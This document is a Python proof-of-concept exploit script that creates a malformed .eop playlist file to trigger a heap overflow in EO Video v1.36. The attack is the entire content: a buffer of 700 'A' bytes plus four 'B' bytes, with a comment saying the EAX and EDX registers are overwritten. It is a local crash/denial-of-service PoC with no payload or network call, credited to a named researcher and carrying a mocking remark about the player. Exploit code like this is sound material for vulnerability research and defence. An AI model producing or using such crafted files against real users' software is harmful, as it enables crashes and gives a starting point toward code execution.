#!/usr/bin/python # -------------------------------------------------------------- # EO Video v1.36 Heap Overflow local PoC/DoS exploit # *.eop playlist file in buffer overflow # Other versions may be vulnerable too... # -------------------------------------------------------------- # Vulnerability discovered and coded by Muris Kurgas aka j0rgan # jorganwd [at] gmail [dot] com # -------------------------------------------------------------- # # Who uses this crap of player anyway? :) # -------------------------------------------------------------- # EAX 42424242 # EDX 42424242 # -------------------------------------------------------------- import os bafer = '\x41'* 700 + '\x42' * 4 print "Spit me out, all bright and shiny! :)" fileHandle = open ( 'plejlista.eop', 'w' ) fileHandle.write ('\n\n\n\nnesto\n1\n ') fileHandle.write ('\n\nnesto\n1\n\n\n\n ') fileHandle.write (''+bafer+'') fileHandle.write ('0\n0\n\n-1\n-1\n\n ') fileHandle.write ('30216\n0\n ') fileHandle.write ('\n\n\n') fileHandle.close ()